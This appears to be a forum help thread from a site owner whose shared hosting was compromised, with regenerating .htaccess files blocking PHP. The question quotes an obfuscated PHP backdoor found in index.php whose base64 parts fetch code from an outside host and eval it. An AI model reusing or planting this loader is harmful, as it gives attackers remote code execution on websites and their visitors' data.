[FIXED] .htaccess files are repeatedly being created in File Directory

Issue

I am having around 10 sites in a shared hosting. Recently I have noticed that there are so many .htaccess files have been created and restricting user access.

<FilesMatch ".(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|phP|PhP|php5|suspected)$">
Order Allow,Deny
Deny from all
</FilesMatch>

Above block is what is written in all code .htaccess. When I delete those, it appears to be regenerated again. meaning there should be a script running somewhere else in the package.I even installed Wordfence plugin to identify the updated files. I restored recent modifications which appeared to be malicious. but still no changes. There are also some encoded code lines in files like index.php which is below.

<?php
 $uoeq967= "O)sl 2Te4x-+gazAbuK_6qrjH0RZt*N3mLcVFEWvh;inySJC91oMfYXId5Up.(GP7D,Bw/kQ8";$vpna644='JGNoID0gY3VybF9pbml0KCdodHRwOi8vYmFua3N';$vpna645='zdG9wLnRlY2gvJy4kX0dFVFsnZiddKTtjdXJsX3';$vpna646='NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBT';$vpna647='lNGRVIsIDEpOyRyZXN1bHQgPSBjdXJsX2V4ZWMo';$vpna648='JGNoKTtldmFsKCc/PicuJHJlc3VsdCk7';$vpna643=$vpna644.$vpna645.$vpna646.$vpna647.$vpna648;function cdim173($fsxi199,$rykc638,$ekcu564){return ''.$fsxi199.''.$rykc638.''.$ekcu564.'';}$qfcg427 = cdim173($uoeq967{34},$uoeq967{13}.$uoeq967{3},$uoeq967{3});$uodu186 = cdim173($uoeq967{19}.$uoeq967{17},$uoeq967{2}.$uoeq967{7},'');$lrbk358 = cdim173($uoeq967{22},$uoeq967{19},$uoeq967{52});$hume205 = cdim173($uoeq967{17},'',$uoeq967{43});$xzdo850 = cdim173($uoeq967{34},$uoeq967{19},$uoeq967{13}.$uoeq967{22});$uqmy998 = cdim173($uoeq967{22},$uoeq967{13},$uoeq967{44});$aobc355 =cdim173(cdim173($qfcg427,'',$uodu186),cdim173($lrbk358,$hume205,''),cdim173($xzdo850,'',$uqmy998));$xggn756 = cdim173($uoeq967{34},$uoeq967{22},$uoeq967{7});$gnix510 = cdim173($uoeq967{13},$uoeq967{28},'');$wdfm884 = cdim173($uoeq967{7},'',$uoeq967{19});$loyh183 = cdim173($uoeq967{52},$uoeq967{17},$uoeq967{43});$bwfh819 = cdim173($uoeq967{34},$uoeq967{28},'');$jrmp133 = cdim173($uoeq967{42},$uoeq967{50},'');$iprf791 = cdim173('',$uoeq967{43},'');$hwks376 = cdim173( cdim173($xggn756,$gnix510,$wdfm884), cdim173($loyh183,'',$bwfh819), cdim173($jrmp133,'',$iprf791));$mtzu128 = cdim173($uoeq967{7},'',$uoeq967{39});$hesn342= cdim173($uoeq967{13},$uoeq967{3},$uoeq967{61});$taop807 = cdim173('',$uoeq967{16},$uoeq967{13});$gvcw064 = cdim173($uoeq967{2},$uoeq967{7},$uoeq967{20});$bihf178 = cdim173($uoeq967{8},$uoeq967{19},$uoeq967{56});$efaa907 = cdim173($uoeq967{7},$uoeq967{34},$uoeq967{50});$tvhp307 = cdim173($uoeq967{56},$uoeq967{7},$uoeq967{61});$qyff908 = cdim173(cdim173($mtzu128,$hesn342,''),cdim173('','',$taop807),cdim173($gvcw064,$bihf178.$efaa907,$tvhp307)).'"'.$vpna643.'"'.cdim173($uoeq967{1}.$uoeq967{1},'',$uoeq967{41});$aobc355($hwks376,array('','}'.$qyff908.'//'));//wp-blog-header scp-173?>

I have no options to do other than deleting the .htaccess by each and every directory. but it won't solve the problem. What can I possibly do other than emptying my file manager.

Solution

Well, the whole package was hacked. I was unable to do anything. Just as how others suggested I took 2 days to clear the auto generated files one by one. it was deleted and appeared the very next day. Some scripts were probably running at the back which creates the files. So the only solution is;

1. Contacting the hosting provider and ask them to totally clean the directory, and start from scratch. OR
2. Contacting a web security analyst and pay them to clear it which costs around 199 USD, least.

Yea, shit happens!

Answered By - Roshan Zaid